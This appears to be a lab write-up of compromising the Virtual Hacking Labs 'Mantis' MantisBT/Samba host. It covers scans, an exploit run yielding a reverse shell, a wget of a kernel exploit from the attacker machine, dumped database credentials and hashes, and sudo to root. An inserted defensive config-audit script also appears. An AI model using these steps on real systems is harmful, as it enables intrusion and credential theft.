Misc, Medium, Linux
VHL — Mantis
MantisBT bug tracker with Samba shares on Ubuntu. Enumeration of SMB reveals credentials reused for MantisBT admin access.
February 12, 2025, Virtual Hacking Labs
#MantisBT #Samba #SMB #Credential Reuse
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 21:44 EST
Nmap scan report for 10.11.1.74
Host is up (0.023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:20:85:0d:42:d0:88:8d:57:8f:0c:7b:fe:12:ff:8c (RSA)
| 256 1f:e5:0b:97:32:7d:07:f5:de:f7:34:7d:0d:e0:ba:c6 (ECDSA)
|_ 256 25:7b:9b:15:86:7e:4a:19:04:bc:4f:58:79:9d:55:87 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.8-Ubuntu (workgroup: WORKGROUP)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.8-Ubuntu)
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: \x00
| FQDN: mantis
|_ System time: 2025-02-12T21:44:33-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 3s
|_nbstat: NetBIOS name: MANTIS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2025-02-13T02:44:33
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 22.66 ms 10.11.1.74
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.83 seconds
80
sh
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
directory search
sh
dirsearch -u http://10.11.1.74/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Mantis/reports/http_10.11.1.74/__25-02-12_21-46-39.txt
Target: http://10.11.1.74/
[21:46:39] Starting:
[21:46:41] 403 - 296B - /.ht_wsr.txt
[21:46:41] 403 - 299B - /.htaccess.orig
[21:46:41] 403 - 299B - /.htaccess_orig
[21:46:41] 403 - 297B - /.htaccess_sc
[21:46:41] 403 - 301B - /.htaccess.sample
[21:46:41] 403 - 290B - /.html
[21:46:41] 403 - 299B - /.htaccess.bak1
[21:46:41] 403 - 299B - /.htaccess.save
[21:46:41] 403 - 297B - /.htaccessOLD
[21:46:41] 403 - 298B - /.htaccessOLD2
[21:46:41] 403 - 295B - /.htpasswds
[21:46:41] 403 - 296B - /.httr-oauth
[21:46:41] 403 - 297B - /.htaccessBAK
[21:46:41] 403 - 299B - /.htpasswd_test
[21:46:41] 403 - 289B - /.htm
[21:46:41] 403 - 300B - /.htaccess_extra
[21:46:42] 403 - 289B - /.php
[21:46:42] 403 - 290B - /.php3
[21:47:12] 200 - 39B - /robots.txt
[21:47:13] 403 - 299B - /server-status/
[21:47:13] 403 - 298B - /server-status
robots.txt
- /mantisbt-2.3.0
- modify the code

sh
python2 mantis2.3.0.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
sh
nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.74] 52790
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mantis:/var/www/html/mantisbt-2.3.0$ whoami
whoami
www-data
445
sh
445/tcp open netbios-ssn Samba smbd 4.3.8-Ubuntu (workgroup: WORKGROUP)
sh
smbclient -N -L \\\\10.11.1.74
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (mantis server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
privilege escalation
sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16
sh
╔══════════╣ Searching passwords in config PHP files
$g_db_password = 'root';
* "Driver={SQL Server Native Client 10.0};SERVER=.\sqlexpress;DATABASE=bugtracker;UID=mantis;PWD=password;"
$g_ldap_bind_passwd = '';
$g_lost_password_feature = ON;
$g_max_lost_password_in_progress_count = 3;
$g_send_reset_password = ON;
linux exploit suggester
sh
www-data@mantis:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
- https://www.exploit-db.com/exploits/47170
- didn't work
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc chocobo_root.c -o chocobo_root -lpthread
sh
www-data@mantis:/tmp$ wget http://172.16.1.1/chocobo_root
- didn't work
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -pthread 40839.c -o 40839 -lcrypt
config_inc.php
sh
www-data@mantis:/var/www/html/mantisbt-2.3.0/config$ cat config_inc.php
cat config_inc.php
<?php
$g_hostname = 'localhost';
$g_db_type = 'mysqli';
$g_database_name = 'bugtracker';
$g_db_username = 'root';
$g_db_password = 'root';
$g_default_timezone = 'America/New_York';
$g_crypto_master_salt = 'nrz+LyGkJes7wOZafUINT+bxC8wxkjiLIFnpHB4a08k=';
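An added example, not part of the original writeup: a defender-side check for the database settings that the config_inc.php above exposes (the application connecting as the MySQL superuser with a password equal to the username). The finding identifiers, the password denylist and the 12-character minimum are assumptions made for this example, and the sample config is constructed from the lines shown above.

```python
import re

# Matches simple quoted assignments such as: $g_db_password = 'root';
ASSIGN_RE = re.compile(r"^\s*\$g_(\w+)\s*=\s*(['\"])(.*?)\2\s*;", re.M)

# Assumed policy values for this example, not MantisBT defaults.
COMMON_PASSWORDS = {"", "root", "toor", "password", "admin", "mantis", "123456"}
MIN_PASSWORD_LENGTH = 12

# Constructed sample mirroring the database lines of the config_inc.php above.
SAMPLE_CONFIG = """<?php
$g_hostname = 'localhost';
$g_db_type = 'mysqli';
$g_database_name = 'bugtracker';
$g_db_username = 'root';
$g_db_password = 'root';
"""


def parse_config(text):
    """Return {name: value} for quoted $g_* assignments; the last one wins, as in PHP."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # drop /* ... */ comments
    # Lines starting with // or # never match ASSIGN_RE, so they are ignored too.
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(text)}


def audit_db_credentials(text):
    """Return a list of (finding_id, advice) tuples; an empty list means no finding."""
    cfg = parse_config(text)
    user = cfg.get("db_username", "")
    password = cfg.get("db_password")
    findings = []
    if user.lower() == "root":
        findings.append(("DB_SUPERUSER",
                         "use a dedicated MySQL account limited to the application schema"))
    if password is None:
        findings.append(("PASSWORD_NOT_LITERAL",
                         "db_password is not a quoted literal; review the file manually"))
        return findings
    if password.lower() == user.lower():
        findings.append(("PASSWORD_EQUALS_USERNAME",
                         "set a password that is unrelated to the account name"))
    if password.lower() in COMMON_PASSWORDS:
        findings.append(("PASSWORD_COMMON",
                         "replace the password with a randomly generated one"))
    if len(password) < MIN_PASSWORD_LENGTH:
        findings.append(("PASSWORD_TOO_SHORT",
                         f"use at least {MIN_PASSWORD_LENGTH} characters"))
    return findings


if __name__ == "__main__":
    for finding_id, advice in audit_db_credentials(SAMPLE_CONFIG):
        print(f"{finding_id}: {advice}")
```
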
sh
www-data@mantis:/var/www/html/mantisbt-2.3.0/config$ mysql -u 'root' -p'root'
sh
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bugtracker |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.02 sec)
mysql> use bugtracker
sh
mysql> show tables;
show tables;
+-----------------------------------+
| Tables_in_bugtracker |
+-----------------------------------+
| mantis_api_token_table |
| mantis_bug_file_table |
| mantis_bug_history_table |
| mantis_bug_monitor_table |
| mantis_bug_relationship_table |
| mantis_bug_revision_table |
| mantis_bug_table |
| mantis_bug_tag_table |
| mantis_bug_text_table |
| mantis_bugnote_table |
| mantis_bugnote_text_table |
| mantis_category_table |
| mantis_config_table |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table |
| mantis_custom_field_table |
| mantis_email_table |
| mantis_filters_table |
| mantis_news_table |
| mantis_plugin_table |
| mantis_project_file_table |
| mantis_project_hierarchy_table |
| mantis_project_table |
| mantis_project_user_list_table |
| mantis_project_version_table |
| mantis_sponsorship_table |
| mantis_tag_table |
| mantis_tokens_table |
| mantis_user_pref_table |
| mantis_user_print_pref_table |
| mantis_user_profile_table |
| mantis_user_table |
+-----------------------------------+
32 rows in set (0.00 sec)
sh
mysql> select * from mantis_user_table;
select * from mantis_user_table;
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| id | username | realname | email | password | enabled | protected | access_level | login_count | lost_password_request_count | failed_login_count | cookie_string | last_visit | date_created |
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| 1 | administrator | administrator | root@localhost | 5f4dcc3b... | 1 | 0 | 90 | 8 | 0 | 0 | A_24heg-JSiw-tu-XOsVfiuq8EVC8Xzswaj_aj4iCkLYHExLMjeBVXauZ0LXdRLq | 1739415357 | 1495104271 |
| 2 | John | John | john@mantis.local | 95d3a628... | 1 | 0 | 25 | 0 | 0 | 0 | tRd4wbzjStPFglx0ElJkTPqWMICfASeoYM2oGgo1uTzv0PKzIo94k_46lhyAPMBf | 1495104497 | 1495104497 |
| 3 | Sara | Sara | Sara@mantis.local | ab41dc45... | 1 | 0 | 25 | 0 | 0 | 0 | 8haTH18cfURa4QE3KBuO3XBgAKwXYjTlVjxHpt2OkoL95OGh_ZtIW-w6LJArgpR1 | 1495104515 | 1495104515 |
| 4 | test | | test@email.com | 3a69171d... | 1 | 0 | 25 | 0 | 0 | 1 | KmN7oF6wF9wrIzYXC4noU9NJehNzSisr__SCKFj1LTWHlu07KpFobWrdg4EuiHCA | 1739414985 | 1739414985 |
+----+---------------+---------------+-------------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
4 rows in set (0.00 sec)
login to portal
- Since the exploit script's payload changed the admin password, log in to the portal and check whether it holds any useful information.

creds
sh
SSH: mantis/mantis4testing
ssh as mantis
sh
ssh mantis@10.11.1.74
The authenticity of host '10.11.1.74 (10.11.1.74)' can't be established.
ED25519 key fingerprint is SHA256:J3Ic06jcYeWSypWwYXuxWQ7z/7OVl85d14i5/F94MH4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.74' (ED25519) to the list of known hosts.
mantis@10.11.1.74's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic i686)
* Documentation: https://help.ubuntu.com/
213 packages can be updated.
124 updates are security updates.
Last login: Thu May 18 06:53:18 2017 from 172.16.1.1
mantis@mantis:~$ whoami
mantis
sudo
sh
mantis@mantis:~$ sudo -l
[sudo] password for mantis:
Matching Defaults entries for mantis on mantis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mantis may run the following commands on mantis:
(ALL : ALL) ALL
mantis@mantis:~$ sudo su
root@mantis:/home/mantis# whoami
root
sh
root@mantis:/home/mantis# cat /root/key.txt
8fv6wznh6efx966okspg
root@mantis:/home/mantis# date
Wed Feb 12 22:33:08 EST 2025